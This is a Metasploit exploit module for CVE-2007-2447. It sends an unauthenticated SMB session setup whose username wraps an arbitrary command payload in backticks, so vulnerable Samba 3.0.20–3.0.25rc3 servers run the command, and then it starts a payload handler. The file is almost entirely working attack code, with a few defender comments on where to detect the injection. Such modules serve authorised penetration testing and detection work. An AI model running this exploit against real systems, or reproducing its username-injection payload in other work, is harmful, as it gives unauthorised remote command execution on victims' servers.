metasploit-framework/modules/exploits/multi/samba/usermap_script.rb


##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for CVE-2007-2447: Samba 3.0.20 through 3.0.25rc3 hand the
  # client-supplied username to a shell when the non-default
  # "username map script" smb.conf option is enabled, so shell metacharacters
  # in the username run as the smbd user before authentication happens.
  #
  # Defender's notes: the exposure exists only on hosts that enable that option
  # (check smb.conf on the audited host), and the payload travels in the
  # username field of an SMB Session Setup AndX request (see #exploit), so a
  # network detection can key on shell metacharacters in that field.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB

  # Shorthands for the customized session_setup_ntlmv1 below. The module
  # carries its own copy of that method because, unlike the mixin version,
  # it does not read or validate the server's response at all.
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  # Module metadata: references, payload constraints (cmd payloads only,
  # 1024 bytes, no NOPs) and the single automatic target. Only RPORT is
  # registered here; the remaining SMB options come from the mixin.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Samba "username map script" Command Execution',
      'Description' => %q{
        This module exploits a command execution vulerability in Samba
        versions 3.0.20 through 3.0.25rc3 when using the non-default
        "username map script" configuration option. By specifying a username
        containing shell meta characters, attackers can execute arbitrary
        commands.
        No authentication is needed to exploit this vulnerability since
        this option is used to map usernames prior to authentication!
      },
      'Author' => [ 'jduck' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'CVE', '2007-2447' ],
          [ 'OSVDB', '34700' ],
          [ 'BID', '23972' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
        ],
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Privileged' => true, # root or nobody user
      'Payload' =>
        {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              # *_perl and *_ruby work if they are installed
              # mileage may vary from system to system..
            }
        },
      'Targets' =>
        [
          [ "Automatic", { } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 14 2007'))

    register_options(
      [
        Opt::RPORT(139)
      ], self.class)
  end

  # Send a single NTLMv1 Session Setup AndX request and return without
  # reading the reply.
  #
  # user::   username placed verbatim in the request (this is the injection
  #          point used by #exploit)
  # pass::   a 65-character value is treated as two 32-hex-digit halves
  #          separated by one character (presumably an LM:NT hash pair);
  #          anything else is hashed with lanman_des/ntlm_md4, and an empty
  #          string sends empty hashes
  # domain:: domain string appended after the username
  #
  # Raises XCEPT::NTLM1MissingChallenge when the client has no challenge key,
  # i.e. negotiate has not run yet.
  def session_setup_ntlmv1(user = '', pass = '', domain = '')
    raise XCEPT::NTLM1MissingChallenge if not self.simple.client.challenge_key

    if (pass.length == 65)
      # NOTE(review): 'H42' requests 42 hex digits but each slice supplies 32,
      # so pack pads the 16-byte hash with zero bytes before e_p24 sees it.
      # #exploit never takes this branch (it passes rand_text(16)); confirm
      # against the mixin's own session_setup_ntlmv1 before relying on it.
      hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.simple.client.challenge_key)
      hash_nt = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.simple.client.challenge_key)
    else
      hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.simple.client.challenge_key) : ''
      hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.simple.client.challenge_key) : ''
    end

    # Variable-length tail of the request, in wire order: LM hash, NT hash,
    # then the four NUL-terminated strings. The order must match the
    # PasswordLenLM/PasswordLenNT fields set below.
    data = ''
    data << hash_lm
    data << hash_nt
    data << user + "\x00"
    data << domain + "\x00"
    data << self.simple.client.native_os + "\x00"
    data << self.simple.client.native_lm + "\x00"

    pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
    self.simple.client.smb_defaults(pkt['Payload']['SMB'])

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0x2001
    pkt['Payload']['SMB'].v['WordCount'] = 13
    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['MaxBuff'] = 0xffdf
    pkt['Payload'].v['MaxMPX'] = 2
    pkt['Payload'].v['VCNum'] = 1
    pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
    pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
    pkt['Payload'].v['Capabilities'] = 64
    pkt['Payload'].v['SessionKey'] = self.simple.client.session_id
    pkt['Payload'].v['Payload'] = data

    self.simple.client.smb_send(pkt.to_s)

    # We don't care how the server responds, we should have a session already :)
    # And such is our leet customization.
  end

  # Connect, negotiate, send one session setup whose username carries the
  # command, then start the payload handler. The server's reply is ignored:
  # the command has already run by the time Samba answers, so timeouts and
  # login failures are expected and deliberately swallowed.
  def exploit
    connect

    # The username itself is the injection: Samba substitutes it into the
    # map script's shell command line unescaped, so the backtick expression
    # executes with the encoded payload as the command.
    username = "/=`nohup " + payload.encoded + "`"

    begin
      simple.client.negotiate(false)
      # Password is random filler; only the username matters here.
      # SMBDomain is presumably registered by the SMB mixin.
      session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'])
    rescue ::Timeout::Error, XCEPT::LoginError
      # nothing
    end

    handler
  end
end